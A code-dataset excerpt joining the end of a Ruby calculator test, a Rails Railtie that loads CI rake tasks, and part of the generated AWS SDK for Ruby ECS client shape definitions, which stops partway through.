assert_equal 5 * 8, @calc.compute('5*8')
end
def test_compute_division
assert_equal 18 / 3, @calc.compute('18/3')
end
def test_compute_many_operations
assert_equal 4 + 5 * 2 - 81 / 9, @calc.compute('4+5*2-81/9')
end
def test_compute_operations_with_parenthesis
assert_equal (8 + 3) * 7 - 64 / (13 - 5), @calc.compute('(8+3)*7-64/(13-5)')
end
end
| 21.648649 | 80 | 0.685393 |
91b3b18146b0e01e9267790c2e0d6bc0069c0a1c | 236 | require 'u2i/ci_utils'
require 'rails'
module U2i
module CiUtils
class Railtie < Rails::Railtie
railtie_name :u2i_ci_rake_tasks
rake_tasks do
require 'u2i/ci_utils/rake_tasks/all'
end
end
end
end
| 15.733333 | 45 | 0.677966 |
ff1c42c0b54d8b02b71d47b126beb47584fd7c8f | 99,019 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::ECS
# @api private
module ClientApi
include Seahorse::Model
AccessDeniedException = Shapes::StructureShape.new(name: 'AccessDeniedException')
AgentUpdateStatus = Shapes::StringShape.new(name: 'AgentUpdateStatus')
AssignPublicIp = Shapes::StringShape.new(name: 'AssignPublicIp')
Attachment = Shapes::StructureShape.new(name: 'Attachment')
AttachmentDetails = Shapes::ListShape.new(name: 'AttachmentDetails')
AttachmentStateChange = Shapes::StructureShape.new(name: 'AttachmentStateChange')
AttachmentStateChanges = Shapes::ListShape.new(name: 'AttachmentStateChanges')
Attachments = Shapes::ListShape.new(name: 'Attachments')
Attribute = Shapes::StructureShape.new(name: 'Attribute')
AttributeLimitExceededException = Shapes::StructureShape.new(name: 'AttributeLimitExceededException')
Attributes = Shapes::ListShape.new(name: 'Attributes')
AwsVpcConfiguration = Shapes::StructureShape.new(name: 'AwsVpcConfiguration')
BlockedException = Shapes::StructureShape.new(name: 'BlockedException')
Boolean = Shapes::BooleanShape.new(name: 'Boolean')
BoxedBoolean = Shapes::BooleanShape.new(name: 'BoxedBoolean')
BoxedInteger = Shapes::IntegerShape.new(name: 'BoxedInteger')
ClientException = Shapes::StructureShape.new(name: 'ClientException')
Cluster = Shapes::StructureShape.new(name: 'Cluster')
ClusterContainsContainerInstancesException = Shapes::StructureShape.new(name: 'ClusterContainsContainerInstancesException')
ClusterContainsServicesException = Shapes::StructureShape.new(name: 'ClusterContainsServicesException')
ClusterContainsTasksException = Shapes::StructureShape.new(name: 'ClusterContainsTasksException')
ClusterField = Shapes::StringShape.new(name: 'ClusterField')
ClusterFieldList = Shapes::ListShape.new(name: 'ClusterFieldList')
ClusterNotFoundException = Shapes::StructureShape.new(name: 'ClusterNotFoundException')
Clusters = Shapes::ListShape.new(name: 'Clusters')
Compatibility = Shapes::StringShape.new(name: 'Compatibility')
CompatibilityList = Shapes::ListShape.new(name: 'CompatibilityList')
Connectivity = Shapes::StringShape.new(name: 'Connectivity')
Container = Shapes::StructureShape.new(name: 'Container')
ContainerDefinition = Shapes::StructureShape.new(name: 'ContainerDefinition')
ContainerDefinitions = Shapes::ListShape.new(name: 'ContainerDefinitions')
ContainerInstance = Shapes::StructureShape.new(name: 'ContainerInstance')
ContainerInstanceStatus = Shapes::StringShape.new(name: 'ContainerInstanceStatus')
ContainerInstances = Shapes::ListShape.new(name: 'ContainerInstances')
ContainerOverride = Shapes::StructureShape.new(name: 'ContainerOverride')
ContainerOverrides = Shapes::ListShape.new(name: 'ContainerOverrides')
ContainerStateChange = Shapes::StructureShape.new(name: 'ContainerStateChange')
ContainerStateChanges = Shapes::ListShape.new(name: 'ContainerStateChanges')
Containers = Shapes::ListShape.new(name: 'Containers')
CreateClusterRequest = Shapes::StructureShape.new(name: 'CreateClusterRequest')
CreateClusterResponse = Shapes::StructureShape.new(name: 'CreateClusterResponse')
CreateServiceRequest = Shapes::StructureShape.new(name: 'CreateServiceRequest')
CreateServiceResponse = Shapes::StructureShape.new(name: 'CreateServiceResponse')
DeleteAttributesRequest = Shapes::StructureShape.new(name: 'DeleteAttributesRequest')
DeleteAttributesResponse = Shapes::StructureShape.new(name: 'DeleteAttributesResponse')
DeleteClusterRequest = Shapes::StructureShape.new(name: 'DeleteClusterRequest')
DeleteClusterResponse = Shapes::StructureShape.new(name: 'DeleteClusterResponse')
DeleteServiceRequest = Shapes::StructureShape.new(name: 'DeleteServiceRequest')
DeleteServiceResponse = Shapes::StructureShape.new(name: 'DeleteServiceResponse')
Deployment = Shapes::StructureShape.new(name: 'Deployment')
DeploymentConfiguration = Shapes::StructureShape.new(name: 'DeploymentConfiguration')
Deployments = Shapes::ListShape.new(name: 'Deployments')
DeregisterContainerInstanceRequest = Shapes::StructureShape.new(name: 'DeregisterContainerInstanceRequest')
DeregisterContainerInstanceResponse = Shapes::StructureShape.new(name: 'DeregisterContainerInstanceResponse')
DeregisterTaskDefinitionRequest = Shapes::StructureShape.new(name: 'DeregisterTaskDefinitionRequest')
DeregisterTaskDefinitionResponse = Shapes::StructureShape.new(name: 'DeregisterTaskDefinitionResponse')
DescribeClustersRequest = Shapes::StructureShape.new(name: 'DescribeClustersRequest')
DescribeClustersResponse = Shapes::StructureShape.new(name: 'DescribeClustersResponse')
DescribeContainerInstancesRequest = Shapes::StructureShape.new(name: 'DescribeContainerInstancesRequest')
DescribeContainerInstancesResponse = Shapes::StructureShape.new(name: 'DescribeContainerInstancesResponse')
DescribeServicesRequest = Shapes::StructureShape.new(name: 'DescribeServicesRequest')
DescribeServicesResponse = Shapes::StructureShape.new(name: 'DescribeServicesResponse')
DescribeTaskDefinitionRequest = Shapes::StructureShape.new(name: 'DescribeTaskDefinitionRequest')
DescribeTaskDefinitionResponse = Shapes::StructureShape.new(name: 'DescribeTaskDefinitionResponse')
DescribeTasksRequest = Shapes::StructureShape.new(name: 'DescribeTasksRequest')
DescribeTasksResponse = Shapes::StructureShape.new(name: 'DescribeTasksResponse')
DesiredStatus = Shapes::StringShape.new(name: 'DesiredStatus')
Device = Shapes::StructureShape.new(name: 'Device')
DeviceCgroupPermission = Shapes::StringShape.new(name: 'DeviceCgroupPermission')
DeviceCgroupPermissions = Shapes::ListShape.new(name: 'DeviceCgroupPermissions')
DevicesList = Shapes::ListShape.new(name: 'DevicesList')
DiscoverPollEndpointRequest = Shapes::StructureShape.new(name: 'DiscoverPollEndpointRequest')
DiscoverPollEndpointResponse = Shapes::StructureShape.new(name: 'DiscoverPollEndpointResponse')
DockerLabelsMap = Shapes::MapShape.new(name: 'DockerLabelsMap')
Double = Shapes::FloatShape.new(name: 'Double')
EnvironmentVariables = Shapes::ListShape.new(name: 'EnvironmentVariables')
Failure = Shapes::StructureShape.new(name: 'Failure')
Failures = Shapes::ListShape.new(name: 'Failures')
HealthCheck = Shapes::StructureShape.new(name: 'HealthCheck')
HealthStatus = Shapes::StringShape.new(name: 'HealthStatus')
HostEntry = Shapes::StructureShape.new(name: 'HostEntry')
HostEntryList = Shapes::ListShape.new(name: 'HostEntryList')
HostVolumeProperties = Shapes::StructureShape.new(name: 'HostVolumeProperties')
Integer = Shapes::IntegerShape.new(name: 'Integer')
InvalidParameterException = Shapes::StructureShape.new(name: 'InvalidParameterException')
KernelCapabilities = Shapes::StructureShape.new(name: 'KernelCapabilities')
KeyValuePair = Shapes::StructureShape.new(name: 'KeyValuePair')
LaunchType = Shapes::StringShape.new(name: 'LaunchType')
LinuxParameters = Shapes::StructureShape.new(name: 'LinuxParameters')
ListAttributesRequest = Shapes::StructureShape.new(name: 'ListAttributesRequest')
ListAttributesResponse = Shapes::StructureShape.new(name: 'ListAttributesResponse')
ListClustersRequest = Shapes::StructureShape.new(name: 'ListClustersRequest')
ListClustersResponse = Shapes::StructureShape.new(name: 'ListClustersResponse')
ListContainerInstancesRequest = Shapes::StructureShape.new(name: 'ListContainerInstancesRequest')
ListContainerInstancesResponse = Shapes::StructureShape.new(name: 'ListContainerInstancesResponse')
ListServicesRequest = Shapes::StructureShape.new(name: 'ListServicesRequest')
ListServicesResponse = Shapes::StructureShape.new(name: 'ListServicesResponse')
ListTaskDefinitionFamiliesRequest = Shapes::StructureShape.new(name: 'ListTaskDefinitionFamiliesRequest')
ListTaskDefinitionFamiliesResponse = Shapes::StructureShape.new(name: 'ListTaskDefinitionFamiliesResponse')
ListTaskDefinitionsRequest = Shapes::StructureShape.new(name: 'ListTaskDefinitionsRequest')
ListTaskDefinitionsResponse = Shapes::StructureShape.new(name: 'ListTaskDefinitionsResponse')
ListTasksRequest = Shapes::StructureShape.new(name: 'ListTasksRequest')
ListTasksResponse = Shapes::StructureShape.new(name: 'ListTasksResponse')
LoadBalancer = Shapes::StructureShape.new(name: 'LoadBalancer')
LoadBalancers = Shapes::ListShape.new(name: 'LoadBalancers')
LogConfiguration = Shapes::StructureShape.new(name: 'LogConfiguration')
LogConfigurationOptionsMap = Shapes::MapShape.new(name: 'LogConfigurationOptionsMap')
LogDriver = Shapes::StringShape.new(name: 'LogDriver')
Long = Shapes::IntegerShape.new(name: 'Long')
MissingVersionException = Shapes::StructureShape.new(name: 'MissingVersionException')
MountPoint = Shapes::StructureShape.new(name: 'MountPoint')
MountPointList = Shapes::ListShape.new(name: 'MountPointList')
NetworkBinding = Shapes::StructureShape.new(name: 'NetworkBinding')
NetworkBindings = Shapes::ListShape.new(name: 'NetworkBindings')
NetworkConfiguration = Shapes::StructureShape.new(name: 'NetworkConfiguration')
NetworkInterface = Shapes::StructureShape.new(name: 'NetworkInterface')
NetworkInterfaces = Shapes::ListShape.new(name: 'NetworkInterfaces')
NetworkMode = Shapes::StringShape.new(name: 'NetworkMode')
NoUpdateAvailableException = Shapes::StructureShape.new(name: 'NoUpdateAvailableException')
PlacementConstraint = Shapes::StructureShape.new(name: 'PlacementConstraint')
PlacementConstraintType = Shapes::StringShape.new(name: 'PlacementConstraintType')
PlacementConstraints = Shapes::ListShape.new(name: 'PlacementConstraints')
PlacementStrategies = Shapes::ListShape.new(name: 'PlacementStrategies')
PlacementStrategy = Shapes::StructureShape.new(name: 'PlacementStrategy')
PlacementStrategyType = Shapes::StringShape.new(name: 'PlacementStrategyType')
PlatformTaskDefinitionIncompatibilityException = Shapes::StructureShape.new(name: 'PlatformTaskDefinitionIncompatibilityException')
PlatformUnknownException = Shapes::StructureShape.new(name: 'PlatformUnknownException')
PortMapping = Shapes::StructureShape.new(name: 'PortMapping')
PortMappingList = Shapes::ListShape.new(name: 'PortMappingList')
PutAttributesRequest = Shapes::StructureShape.new(name: 'PutAttributesRequest')
PutAttributesResponse = Shapes::StructureShape.new(name: 'PutAttributesResponse')
RegisterContainerInstanceRequest = Shapes::StructureShape.new(name: 'RegisterContainerInstanceRequest')
RegisterContainerInstanceResponse = Shapes::StructureShape.new(name: 'RegisterContainerInstanceResponse')
RegisterTaskDefinitionRequest = Shapes::StructureShape.new(name: 'RegisterTaskDefinitionRequest')
RegisterTaskDefinitionResponse = Shapes::StructureShape.new(name: 'RegisterTaskDefinitionResponse')
RepositoryCredentials = Shapes::StructureShape.new(name: 'RepositoryCredentials')
RequiresAttributes = Shapes::ListShape.new(name: 'RequiresAttributes')
Resource = Shapes::StructureShape.new(name: 'Resource')
Resources = Shapes::ListShape.new(name: 'Resources')
RunTaskRequest = Shapes::StructureShape.new(name: 'RunTaskRequest')
RunTaskResponse = Shapes::StructureShape.new(name: 'RunTaskResponse')
SchedulingStrategy = Shapes::StringShape.new(name: 'SchedulingStrategy')
ServerException = Shapes::StructureShape.new(name: 'ServerException')
Service = Shapes::StructureShape.new(name: 'Service')
ServiceEvent = Shapes::StructureShape.new(name: 'ServiceEvent')
ServiceEvents = Shapes::ListShape.new(name: 'ServiceEvents')
ServiceNotActiveException = Shapes::StructureShape.new(name: 'ServiceNotActiveException')
ServiceNotFoundException = Shapes::StructureShape.new(name: 'ServiceNotFoundException')
ServiceRegistries = Shapes::ListShape.new(name: 'ServiceRegistries')
ServiceRegistry = Shapes::StructureShape.new(name: 'ServiceRegistry')
Services = Shapes::ListShape.new(name: 'Services')
SortOrder = Shapes::StringShape.new(name: 'SortOrder')
StartTaskRequest = Shapes::StructureShape.new(name: 'StartTaskRequest')
StartTaskResponse = Shapes::StructureShape.new(name: 'StartTaskResponse')
Statistics = Shapes::ListShape.new(name: 'Statistics')
StopTaskRequest = Shapes::StructureShape.new(name: 'StopTaskRequest')
StopTaskResponse = Shapes::StructureShape.new(name: 'StopTaskResponse')
String = Shapes::StringShape.new(name: 'String')
StringList = Shapes::ListShape.new(name: 'StringList')
SubmitContainerStateChangeRequest = Shapes::StructureShape.new(name: 'SubmitContainerStateChangeRequest')
SubmitContainerStateChangeResponse = Shapes::StructureShape.new(name: 'SubmitContainerStateChangeResponse')
SubmitTaskStateChangeRequest = Shapes::StructureShape.new(name: 'SubmitTaskStateChangeRequest')
SubmitTaskStateChangeResponse = Shapes::StructureShape.new(name: 'SubmitTaskStateChangeResponse')
TargetNotFoundException = Shapes::StructureShape.new(name: 'TargetNotFoundException')
TargetType = Shapes::StringShape.new(name: 'TargetType')
Task = Shapes::StructureShape.new(name: 'Task')
TaskDefinition = Shapes::StructureShape.new(name: 'TaskDefinition')
TaskDefinitionFamilyStatus = Shapes::StringShape.new(name: 'TaskDefinitionFamilyStatus')
TaskDefinitionPlacementConstraint = Shapes::StructureShape.new(name: 'TaskDefinitionPlacementConstraint')
TaskDefinitionPlacementConstraintType = Shapes::StringShape.new(name: 'TaskDefinitionPlacementConstraintType')
TaskDefinitionPlacementConstraints = Shapes::ListShape.new(name: 'TaskDefinitionPlacementConstraints')
TaskDefinitionStatus = Shapes::StringShape.new(name: 'TaskDefinitionStatus')
TaskOverride = Shapes::StructureShape.new(name: 'TaskOverride')
Tasks = Shapes::ListShape.new(name: 'Tasks')
Timestamp = Shapes::TimestampShape.new(name: 'Timestamp')
Tmpfs = Shapes::StructureShape.new(name: 'Tmpfs')
TmpfsList = Shapes::ListShape.new(name: 'TmpfsList')
TransportProtocol = Shapes::StringShape.new(name: 'TransportProtocol')
Ulimit = Shapes::StructureShape.new(name: 'Ulimit')
UlimitList = Shapes::ListShape.new(name: 'UlimitList')
UlimitName = Shapes::StringShape.new(name: 'UlimitName')
UnsupportedFeatureException = Shapes::StructureShape.new(name: 'UnsupportedFeatureException')
UpdateContainerAgentRequest = Shapes::StructureShape.new(name: 'UpdateContainerAgentRequest')
UpdateContainerAgentResponse = Shapes::StructureShape.new(name: 'UpdateContainerAgentResponse')
UpdateContainerInstancesStateRequest = Shapes::StructureShape.new(name: 'UpdateContainerInstancesStateRequest')
UpdateContainerInstancesStateResponse = Shapes::StructureShape.new(name: 'UpdateContainerInstancesStateResponse')
UpdateInProgressException = Shapes::StructureShape.new(name: 'UpdateInProgressException')
UpdateServiceRequest = Shapes::StructureShape.new(name: 'UpdateServiceRequest')
UpdateServiceResponse = Shapes::StructureShape.new(name: 'UpdateServiceResponse')
VersionInfo = Shapes::StructureShape.new(name: 'VersionInfo')
Volume = Shapes::StructureShape.new(name: 'Volume')
VolumeFrom = Shapes::StructureShape.new(name: 'VolumeFrom')
VolumeFromList = Shapes::ListShape.new(name: 'VolumeFromList')
VolumeList = Shapes::ListShape.new(name: 'VolumeList')
Attachment.add_member(:id, Shapes::ShapeRef.new(shape: String, location_name: "id"))
Attachment.add_member(:type, Shapes::ShapeRef.new(shape: String, location_name: "type"))
Attachment.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Attachment.add_member(:details, Shapes::ShapeRef.new(shape: AttachmentDetails, location_name: "details"))
Attachment.struct_class = Types::Attachment
AttachmentDetails.member = Shapes::ShapeRef.new(shape: KeyValuePair)
AttachmentStateChange.add_member(:attachment_arn, Shapes::ShapeRef.new(shape: String, required: true, location_name: "attachmentArn"))
AttachmentStateChange.add_member(:status, Shapes::ShapeRef.new(shape: String, required: true, location_name: "status"))
AttachmentStateChange.struct_class = Types::AttachmentStateChange
AttachmentStateChanges.member = Shapes::ShapeRef.new(shape: AttachmentStateChange)
Attachments.member = Shapes::ShapeRef.new(shape: Attachment)
Attribute.add_member(:name, Shapes::ShapeRef.new(shape: String, required: true, location_name: "name"))
Attribute.add_member(:value, Shapes::ShapeRef.new(shape: String, location_name: "value"))
Attribute.add_member(:target_type, Shapes::ShapeRef.new(shape: TargetType, location_name: "targetType"))
Attribute.add_member(:target_id, Shapes::ShapeRef.new(shape: String, location_name: "targetId"))
Attribute.struct_class = Types::Attribute
Attributes.member = Shapes::ShapeRef.new(shape: Attribute)
AwsVpcConfiguration.add_member(:subnets, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "subnets"))
AwsVpcConfiguration.add_member(:security_groups, Shapes::ShapeRef.new(shape: StringList, location_name: "securityGroups"))
AwsVpcConfiguration.add_member(:assign_public_ip, Shapes::ShapeRef.new(shape: AssignPublicIp, location_name: "assignPublicIp"))
AwsVpcConfiguration.struct_class = Types::AwsVpcConfiguration
Cluster.add_member(:cluster_arn, Shapes::ShapeRef.new(shape: String, location_name: "clusterArn"))
Cluster.add_member(:cluster_name, Shapes::ShapeRef.new(shape: String, location_name: "clusterName"))
Cluster.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Cluster.add_member(:registered_container_instances_count, Shapes::ShapeRef.new(shape: Integer, location_name: "registeredContainerInstancesCount"))
Cluster.add_member(:running_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningTasksCount"))
Cluster.add_member(:pending_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingTasksCount"))
Cluster.add_member(:active_services_count, Shapes::ShapeRef.new(shape: Integer, location_name: "activeServicesCount"))
Cluster.add_member(:statistics, Shapes::ShapeRef.new(shape: Statistics, location_name: "statistics"))
Cluster.struct_class = Types::Cluster
ClusterFieldList.member = Shapes::ShapeRef.new(shape: ClusterField)
Clusters.member = Shapes::ShapeRef.new(shape: Cluster)
CompatibilityList.member = Shapes::ShapeRef.new(shape: Compatibility)
Container.add_member(:container_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerArn"))
Container.add_member(:task_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskArn"))
Container.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
Container.add_member(:last_status, Shapes::ShapeRef.new(shape: String, location_name: "lastStatus"))
Container.add_member(:exit_code, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "exitCode"))
Container.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
Container.add_member(:network_bindings, Shapes::ShapeRef.new(shape: NetworkBindings, location_name: "networkBindings"))
Container.add_member(:network_interfaces, Shapes::ShapeRef.new(shape: NetworkInterfaces, location_name: "networkInterfaces"))
Container.add_member(:health_status, Shapes::ShapeRef.new(shape: HealthStatus, location_name: "healthStatus"))
Container.struct_class = Types::Container
ContainerDefinition.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
ContainerDefinition.add_member(:image, Shapes::ShapeRef.new(shape: String, location_name: "image"))
ContainerDefinition.add_member(:repository_credentials, Shapes::ShapeRef.new(shape: RepositoryCredentials, location_name: "repositoryCredentials"))
ContainerDefinition.add_member(:cpu, Shapes::ShapeRef.new(shape: Integer, location_name: "cpu"))
ContainerDefinition.add_member(:memory, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memory"))
ContainerDefinition.add_member(:memory_reservation, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memoryReservation"))
ContainerDefinition.add_member(:links, Shapes::ShapeRef.new(shape: StringList, location_name: "links"))
ContainerDefinition.add_member(:port_mappings, Shapes::ShapeRef.new(shape: PortMappingList, location_name: "portMappings"))
ContainerDefinition.add_member(:essential, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "essential"))
ContainerDefinition.add_member(:entry_point, Shapes::ShapeRef.new(shape: StringList, location_name: "entryPoint"))
ContainerDefinition.add_member(:command, Shapes::ShapeRef.new(shape: StringList, location_name: "command"))
ContainerDefinition.add_member(:environment, Shapes::ShapeRef.new(shape: EnvironmentVariables, location_name: "environment"))
ContainerDefinition.add_member(:mount_points, Shapes::ShapeRef.new(shape: MountPointList, location_name: "mountPoints"))
ContainerDefinition.add_member(:volumes_from, Shapes::ShapeRef.new(shape: VolumeFromList, location_name: "volumesFrom"))
ContainerDefinition.add_member(:linux_parameters, Shapes::ShapeRef.new(shape: LinuxParameters, location_name: "linuxParameters"))
ContainerDefinition.add_member(:hostname, Shapes::ShapeRef.new(shape: String, location_name: "hostname"))
ContainerDefinition.add_member(:user, Shapes::ShapeRef.new(shape: String, location_name: "user"))
ContainerDefinition.add_member(:working_directory, Shapes::ShapeRef.new(shape: String, location_name: "workingDirectory"))
ContainerDefinition.add_member(:disable_networking, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "disableNetworking"))
ContainerDefinition.add_member(:privileged, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "privileged"))
ContainerDefinition.add_member(:readonly_root_filesystem, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "readonlyRootFilesystem"))
ContainerDefinition.add_member(:dns_servers, Shapes::ShapeRef.new(shape: StringList, location_name: "dnsServers"))
ContainerDefinition.add_member(:dns_search_domains, Shapes::ShapeRef.new(shape: StringList, location_name: "dnsSearchDomains"))
ContainerDefinition.add_member(:extra_hosts, Shapes::ShapeRef.new(shape: HostEntryList, location_name: "extraHosts"))
ContainerDefinition.add_member(:docker_security_options, Shapes::ShapeRef.new(shape: StringList, location_name: "dockerSecurityOptions"))
ContainerDefinition.add_member(:docker_labels, Shapes::ShapeRef.new(shape: DockerLabelsMap, location_name: "dockerLabels"))
ContainerDefinition.add_member(:ulimits, Shapes::ShapeRef.new(shape: UlimitList, location_name: "ulimits"))
ContainerDefinition.add_member(:log_configuration, Shapes::ShapeRef.new(shape: LogConfiguration, location_name: "logConfiguration"))
ContainerDefinition.add_member(:health_check, Shapes::ShapeRef.new(shape: HealthCheck, location_name: "healthCheck"))
ContainerDefinition.struct_class = Types::ContainerDefinition
ContainerDefinitions.member = Shapes::ShapeRef.new(shape: ContainerDefinition)
ContainerInstance.add_member(:container_instance_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerInstanceArn"))
ContainerInstance.add_member(:ec2_instance_id, Shapes::ShapeRef.new(shape: String, location_name: "ec2InstanceId"))
ContainerInstance.add_member(:version, Shapes::ShapeRef.new(shape: Long, location_name: "version"))
ContainerInstance.add_member(:version_info, Shapes::ShapeRef.new(shape: VersionInfo, location_name: "versionInfo"))
ContainerInstance.add_member(:remaining_resources, Shapes::ShapeRef.new(shape: Resources, location_name: "remainingResources"))
ContainerInstance.add_member(:registered_resources, Shapes::ShapeRef.new(shape: Resources, location_name: "registeredResources"))
ContainerInstance.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
ContainerInstance.add_member(:agent_connected, Shapes::ShapeRef.new(shape: Boolean, location_name: "agentConnected"))
ContainerInstance.add_member(:running_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningTasksCount"))
ContainerInstance.add_member(:pending_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingTasksCount"))
ContainerInstance.add_member(:agent_update_status, Shapes::ShapeRef.new(shape: AgentUpdateStatus, location_name: "agentUpdateStatus"))
ContainerInstance.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
ContainerInstance.add_member(:registered_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "registeredAt"))
ContainerInstance.add_member(:attachments, Shapes::ShapeRef.new(shape: Attachments, location_name: "attachments"))
ContainerInstance.struct_class = Types::ContainerInstance
ContainerInstances.member = Shapes::ShapeRef.new(shape: ContainerInstance)
ContainerOverride.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
ContainerOverride.add_member(:command, Shapes::ShapeRef.new(shape: StringList, location_name: "command"))
ContainerOverride.add_member(:environment, Shapes::ShapeRef.new(shape: EnvironmentVariables, location_name: "environment"))
ContainerOverride.add_member(:cpu, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "cpu"))
ContainerOverride.add_member(:memory, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memory"))
ContainerOverride.add_member(:memory_reservation, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memoryReservation"))
ContainerOverride.struct_class = Types::ContainerOverride
ContainerOverrides.member = Shapes::ShapeRef.new(shape: ContainerOverride)
ContainerStateChange.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
ContainerStateChange.add_member(:exit_code, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "exitCode"))
ContainerStateChange.add_member(:network_bindings, Shapes::ShapeRef.new(shape: NetworkBindings, location_name: "networkBindings"))
ContainerStateChange.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
ContainerStateChange.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
ContainerStateChange.struct_class = Types::ContainerStateChange
ContainerStateChanges.member = Shapes::ShapeRef.new(shape: ContainerStateChange)
Containers.member = Shapes::ShapeRef.new(shape: Container)
CreateClusterRequest.add_member(:cluster_name, Shapes::ShapeRef.new(shape: String, location_name: "clusterName"))
CreateClusterRequest.struct_class = Types::CreateClusterRequest
CreateClusterResponse.add_member(:cluster, Shapes::ShapeRef.new(shape: Cluster, location_name: "cluster"))
CreateClusterResponse.struct_class = Types::CreateClusterResponse
CreateServiceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
CreateServiceRequest.add_member(:service_name, Shapes::ShapeRef.new(shape: String, required: true, location_name: "serviceName"))
CreateServiceRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
CreateServiceRequest.add_member(:load_balancers, Shapes::ShapeRef.new(shape: LoadBalancers, location_name: "loadBalancers"))
CreateServiceRequest.add_member(:service_registries, Shapes::ShapeRef.new(shape: ServiceRegistries, location_name: "serviceRegistries"))
CreateServiceRequest.add_member(:desired_count, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "desiredCount"))
CreateServiceRequest.add_member(:client_token, Shapes::ShapeRef.new(shape: String, location_name: "clientToken"))
CreateServiceRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
CreateServiceRequest.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
CreateServiceRequest.add_member(:role, Shapes::ShapeRef.new(shape: String, location_name: "role"))
CreateServiceRequest.add_member(:deployment_configuration, Shapes::ShapeRef.new(shape: DeploymentConfiguration, location_name: "deploymentConfiguration"))
CreateServiceRequest.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: PlacementConstraints, location_name: "placementConstraints"))
CreateServiceRequest.add_member(:placement_strategy, Shapes::ShapeRef.new(shape: PlacementStrategies, location_name: "placementStrategy"))
CreateServiceRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
CreateServiceRequest.add_member(:health_check_grace_period_seconds, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "healthCheckGracePeriodSeconds"))
CreateServiceRequest.add_member(:scheduling_strategy, Shapes::ShapeRef.new(shape: SchedulingStrategy, location_name: "schedulingStrategy"))
CreateServiceRequest.struct_class = Types::CreateServiceRequest
CreateServiceResponse.add_member(:service, Shapes::ShapeRef.new(shape: Service, location_name: "service"))
CreateServiceResponse.struct_class = Types::CreateServiceResponse
DeleteAttributesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DeleteAttributesRequest.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, required: true, location_name: "attributes"))
DeleteAttributesRequest.struct_class = Types::DeleteAttributesRequest
DeleteAttributesResponse.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
DeleteAttributesResponse.struct_class = Types::DeleteAttributesResponse
DeleteClusterRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, required: true, location_name: "cluster"))
DeleteClusterRequest.struct_class = Types::DeleteClusterRequest
DeleteClusterResponse.add_member(:cluster, Shapes::ShapeRef.new(shape: Cluster, location_name: "cluster"))
DeleteClusterResponse.struct_class = Types::DeleteClusterResponse
DeleteServiceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DeleteServiceRequest.add_member(:service, Shapes::ShapeRef.new(shape: String, required: true, location_name: "service"))
DeleteServiceRequest.add_member(:force, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "force"))
DeleteServiceRequest.struct_class = Types::DeleteServiceRequest
DeleteServiceResponse.add_member(:service, Shapes::ShapeRef.new(shape: Service, location_name: "service"))
DeleteServiceResponse.struct_class = Types::DeleteServiceResponse
Deployment.add_member(:id, Shapes::ShapeRef.new(shape: String, location_name: "id"))
Deployment.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Deployment.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinition"))
Deployment.add_member(:desired_count, Shapes::ShapeRef.new(shape: Integer, location_name: "desiredCount"))
Deployment.add_member(:pending_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingCount"))
Deployment.add_member(:running_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningCount"))
Deployment.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
Deployment.add_member(:updated_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "updatedAt"))
Deployment.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
Deployment.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
